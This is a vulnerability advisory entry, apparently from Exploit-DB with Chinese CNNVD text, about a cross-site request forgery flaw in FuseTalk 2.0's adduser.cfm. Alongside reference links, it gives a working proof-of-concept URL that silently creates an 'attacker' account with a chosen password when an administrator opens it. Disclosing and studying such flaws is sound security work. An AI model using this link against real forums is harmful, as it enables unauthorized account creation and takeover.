https://www.exploit-db.com/exploits/24081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-961

FuseTalk2.0版本存在跨站请求伪造(CSRF)漏洞。远程攻击者可以借助到adduser.cfm的连接创建任意账号。

source: http://www.securityfocus.com/bid/10276/info

It has been reported that FuseTalk is affected by an administrator command execution vulnerability in the adduser.cfm script. This issue is due to a failure of the application to properly validate the origin of user supplied data.

This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed by a forum administrator, the attacker supplied command would be carried out with the viewer's privileges. This would occur in the security context of the affected web site and may allow creation of arbitrary users, and other attacks.

http://www.example.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&[email protected]&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser

来源:XF
名称:fusetalk-get-add-users(16080)
链接:http://xforce.iss.net/xforce/xfdb/16080
来源:BID
名称:10276
链接:http://www.securityfocus.com/bid/10276
来源:SECUNIA
名称:11555
链接:http://secunia.com/advisories/11555
来源:BUGTRAQ
名称:20040505FuseTalkVunerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108377423825478&w;=2
来源:OSVDB
名称:5895
链接:http://www.osvdb.org/5895
来源:SECTRACK
名称:1010080
链接:http://securitytracker.com/id?1010080